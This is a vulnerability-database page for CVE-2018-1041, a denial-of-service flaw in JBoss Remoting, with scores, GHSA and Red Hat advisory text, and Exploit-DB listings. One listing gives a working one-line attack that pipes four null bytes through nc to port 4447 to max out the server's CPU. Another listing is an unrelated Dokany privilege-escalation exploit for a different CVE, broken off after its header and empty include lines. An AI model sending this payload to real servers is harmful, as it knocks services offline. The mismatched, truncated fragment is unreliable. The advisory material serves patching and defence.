CVE-2018-1041
published 2018-02-15CVE-2018-1041: A vulnerability was found in the way RemoteMessageChannel, introduced in jboss-remoting versions 3.3.10, reads from an empty buffer. An attacker could use this…
PriorityP355high7.5CVSS 3.0
AVNACLPRNUINSUCNINAH
EXPLOIT
EPSS
15.81%
96.5th percentile
A vulnerability was found in the way RemoteMessageChannel, introduced in jboss-remoting versions 3.3.10, reads from an empty buffer. An attacker could use this flaw to cause denial of service via high CPU caused by an infinite loop.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jboss | jboss-remoting | — | — |
| red_hat_inc | jboss-remoting | — | — |
| redhat | jboss_enterprise_application_platform | — | — |
| redhat | jboss_enterprise_application_platform | — | — |
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-r69p-rc7c-rr2m: A vulnerability was found in the way RemoteMessageChannel, introduced in jboss-remoting versions 3
ghsa_unreviewed·2022-05-13
CVE-2018-1041 [HIGH] CWE-835 GHSA-r69p-rc7c-rr2m: A vulnerability was found in the way RemoteMessageChannel, introduced in jboss-remoting versions 3
A vulnerability was found in the way RemoteMessageChannel, introduced in jboss-remoting versions 3.3.10, reads from an empty buffer. An attacker could use this flaw to cause denial of service via high CPU caused by an infinite loop.
Red Hat
jboss-remoting: High CPU Denial of Service
vendor_redhat·2018-02-05·CVSS 7.5
CVE-2018-1041 [HIGH] CWE-835 jboss-remoting: High CPU Denial of Service
jboss-remoting: High CPU Denial of Service
A vulnerability was found in the way RemoteMessageChannel, introduced in jboss-remoting versions 3.3.10, reads from an empty buffer. An attacker could use this flaw to cause denial of service via high CPU caused by an infinite loop.
A vulnerability was found in the way RemoteMessageChannel, introduced in jboss-remoting versions 3.3.10.Final-redhat-1, reads from an empty buffer. An attacker could use this flaw to cause denial of service via high CPU caused by an infinite loop.
Package: jboss-remoting (Red Hat JBoss Enterprise Application Platform 7) - Not affected
No detection rules found.
Exploit-DB
Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation
exploitdb·2019-01-14·CVSS 7.8
CVE-2018-5410 [HIGH] Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation
Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation
---
/*
Exploit Title - Dokany Stack-based Buffer Overflow Privilege Escalation
Date - 14th January 2019
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - http://dokan-dev.github.io
Tested Version - 1.2.0.1000
Driver Version - 1.2.0.1000 - dokan1.sys
Software package - https://github.com/dokan-dev/dokany/releases/download/v1.2.0.1000/DokanSetupDbg_redist.exe
Tested on OS - 32bit Windows 7
CVE ID - CVE-2018-5410
Vendor fix url - https://github.com/dokan-dev/dokany/releases/tag/v1.2.1.1000
CERT/CC Vul note - https://www.kb.cert.org/vuls/id/741315
Fixed Version - 1.2.1.1000
Fixed driver ver - 1.2.1.1000
Check blogpost for details:
https://www.greyhathacker.net/?p=1041
*/
#include
#include
#define BUFSIZE 8
Exploit-DB
JBoss Remoting 6.14.18 - Denial of Service
exploitdb·2018-02-16·CVSS 7.5
CVE-2018-1041 [HIGH] JBoss Remoting 6.14.18 - Denial of Service
JBoss Remoting 6.14.18 - Denial of Service
---
# Exploit Title: Exploit Denial of Service JBoss Remoting (4447/9999)
# Date: 14-02-2018
# Exploit Author: Frank Spierings
# Vendor Homepage:
https://www.redhat.com/en/technologies/jboss-middleware/application-platform/get-started
# Software Link: http://ftp.redhat.com/pub/redhat/jboss/eap/
# Version: JBoss EAP 6.14.18 | Fixed in JBoss EAP 6.14.19
# Tested on: Red Hat Enterprise Linux Server release 7.4 |
# CVE : CVE-2018-1041
This is a very easy Denial of Service exploit. The target only requires 4
null bytes: `\x00\x00\x00\x00`.
The CPU will instantly spike after receiving this payload.
printf "\x00\x00\x00\x00" | nc
`printf "\x00\x00\x00\x00" | nc 127.0.0.1 4447`
http://www.securitytracker.com/id/1040323https://access.redhat.com/errata/RHSA-2018:0268https://access.redhat.com/errata/RHSA-2018:0269https://access.redhat.com/errata/RHSA-2018:0270https://access.redhat.com/errata/RHSA-2018:0271https://access.redhat.com/errata/RHSA-2018:0275https://bugzilla.redhat.com/show_bug.cgi?id=1530457https://www.exploit-db.com/exploits/44099/http://www.securitytracker.com/id/1040323https://access.redhat.com/errata/RHSA-2018:0268https://access.redhat.com/errata/RHSA-2018:0269https://access.redhat.com/errata/RHSA-2018:0270https://access.redhat.com/errata/RHSA-2018:0271https://access.redhat.com/errata/RHSA-2018:0275https://bugzilla.redhat.com/show_bug.cgi?id=1530457https://www.exploit-db.com/exploits/44099/
2018-02-15
Published